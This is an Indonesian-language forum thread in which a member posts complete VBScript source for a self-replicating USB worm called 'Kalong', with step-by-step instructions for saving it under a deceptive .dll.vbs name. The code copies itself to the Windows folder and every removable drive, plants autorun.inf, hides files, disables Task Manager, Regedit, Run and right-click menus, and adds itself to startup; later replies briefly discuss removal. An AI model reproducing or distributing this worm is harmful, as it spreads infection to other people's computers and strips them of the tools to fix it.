Welcome
Welcome to <strong>Forum Bujang-Dayang Bangka Belitung</strong>.

You are currently viewing our boards as a guest, which gives you limited access to view most discussions and access our other features. By joining our free community, you will have access to post topics, communicate privately with other members (PM), respond to polls, upload content, and access many other special features. Registration is fast, simple, and absolutely free, so please, <a href="/profile.php?mode=register">join our community today</a>!

Membuat Virus via notepad

yang lagi bingung kena virus, pingin bagi ilmu program virus, pingin tahu basmi virus. dan lain2x disini mangkalnya

Moderator: amca

Membuat Virus via notepad

Postby amca on 1010,0909,07070707

sekarang ne lah bnyk prog untuk bikin virus secara instan... orang yg pengetahuan e minim ttg dunia pemograman ge pck nikin virus yg pck bikin kite kelabakan.. slah satu e Program VB+ViMaker RC03.

ternyata para pirus2 maker skrg mulai ngelirik bahasa VBS, mngkin VB6.0 yg bnyk beredar adelah bajakan, jadi diorang bikin virus dgn VBS yg pck di bikin hanya kek Notepad kr di window lah ade compiler yg terintegrasi, Windows Based Script Host.

nah sekarang kite cube bikin virus sederhana makek notepad. virus ni pck nyebar lewt removable disc dgn autorun e, sehingga kompi lain yg tercolok kek flashdisk yg terinfeksi ni lngsng jd korban tanpa sempet ngejalan infector e... Virus ni ku beri name Kalong.VBS

sekrng ka buka notepad ka trus copy kede ni :

‘//–Awal dari kode, set agar ketika terjadi Error dibiarkan dan kemudian lanjutkan kegiatan virus–//
on error resume next

‘//–Dim kata-kata berikut ini–//
dim rekur,windowpath,flashdrive,fs,mf,isi,tf,kalong,nt,check,sd

‘//–Set sebuah teks yang nantinya akan dibuat untuk Autorun Setup Information–//
isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe k4l0n6.dll.vbs”
set fs = createobject(”Scripting.FileSystemObject”)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do

‘//–Copy diri untuk menjadi file induk di Windows Path (example: C:\Windows)
Set windowpath = fs.getspecialfolder(0)
set tf = fs.getfile(windowpath & “\batch- k4l0n6.dll.vbs “)
tf.attributes = 32
set tf=fs.createtextfile(windowpath & “\batch- k4l0n6.dll.vbs”,2,true)
tf.write rekursif
tf.close
set tf = fs.getfile(windowpath & “\batch- k4l0n6.dll.vbs “)
tf.attributes = 39
‘//–Buat Atorun.inf untuk menjalankan virus otomatis setiap flash disc tercolok–//
‘Menyebar ke setiap drive yang bertype 1 dan 2(removable) termasuk disket

for each flashdrive in fs.drives
‘//–Cek Drive–//
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> “A:” then

‘//–Buat Infector jika ternyata Drivetypr 1 atau 2. Atau A:\–//
set tf=fs.getfile(flashdrive.path &”\k4l0n6.dll.vbs “)
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &”\k4l0n6.dll.vbs “,2,true)
tf.write rekursif
tf.close
set tf=fs.getfile(flashdrive.path &”\k4l0n6.dll.vbs “)
tf.attributes = 39

‘//–Buat Atorun.inf yang teks-nya tadi sudah disiapkan (Auto Setup Information)–//
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)
tf.write isi
tf.close
set tf = fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes=39
end if
next

‘//–Manipulasi Registry–//

set kalong = createobject(”WScript.Shell”)

‘//–Manip - Ubah Title Internet Explorer menjadi THE KALONG v.s. ZAY–//
kalong.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,” THE KALONG v.s. ZAY “

‘//–Manip – Set agar file hidden tidak ditampilkan di Explorer–//
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden”, “0″, “REG_DWORD”

‘//–Manip – Hilangkan menu Find, Folder Options, Run, dan memblokir Regedit dan Task Manager–//
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, “1″, “REG_DWORD”
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1″, “REG_DWORD”

‘//–Manip – Disable klik kanan–//
kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”, “1″, “REG_DWORD”

‘//–Manip - Munculkan Pesan Setiap Windows Startup–//
kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption”, “Worm Kalong. Variant from Rangga-Zay, don’t panic all data are safe.”

‘//–Manip – Aktif setiap Windows Startup–//
kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir”, windowpath & “\batch- k4l0n6.dll.vbs “

‘//–Manip – Ubah RegisteredOwner dan Organization–//
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization”, “The Batrix”
kalong.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner”,”Kalong”

‘//–Nah kalo kode dibawah ni ko dak tau, tolong baseng untuk menjelaskan–//
if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject(”Wscript.shell”)
sd.run windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname
‘Akhir dari Kode

seve kode di notepad dgn care File-> Save. trus di save as type 'all files (*.*). trus simpen dng name : k4l0n6.dll.vbs. sebener e dak usah pakai *.dll ge dak ape2 tapi ni usaha agar biak telalu mencurigakan.

:lol: :lol: :lol: virus worm ne bukan murni dari pemikiran ku sendiri' krn kode2 e niru kode e virus Rangga-Zay.

oke cek cuman cem tulah pemikiranku semoga jadi pembelajaran kek nambah sedikit e pengetahuan kite. semoga ape yg kite miliki dapat kite guneken untuk kebaikan. :D

salam kompak buat kwan di forum ni...
buat baseng... thank berat cek....
User avatar
amca
Kurang
 
Posts: 45
Joined: 2424,0808,07070707
Location: di kelekak

Postby babe on 2828,0909,07070707

ade dak ubat e bang, men kompi ku kene cemane
User avatar
babe
Sangat Kurang
 
Posts: 36
Joined: 1616,0505,07070707
Location: dirumah saja

Postby amca on 2828,0909,07070707

babe wrote:ade dak ubat e bang, men kompi ku kene cemane


pakek PCMAV RC 18, RC19 / RC 20 atau pake AVIRA ape NORMAN.... :idea:

atau masuk bai ke safe mode trus ka restore ulang system e trus hapus registry yg ke infeksi ( yang berbau name kalong ) tapi sebelum ka nyube e backup dulu data kek registry ka.... :wink:
User avatar
amca
Kurang
 
Posts: 45
Joined: 2424,0808,07070707
Location: di kelekak

Ngenakot

Postby Mr. Ngerapix on 1919,0101,08080808

Ngenakot cek.... ilmu e
Tp jadilah utk nambah wawasan.
Keep posting ok. Biar nambah pinter org bangka
He....<joke>
User avatar
Mr. Ngerapix
Sangat Kurang
 
Posts: 12
Joined: 2828,0909,07070707
Location: Ku ge dak tau di mn, LUPAK !!!


Return to Virus

Who is online

Users browsing this forum: No registered users and 0 guests

cron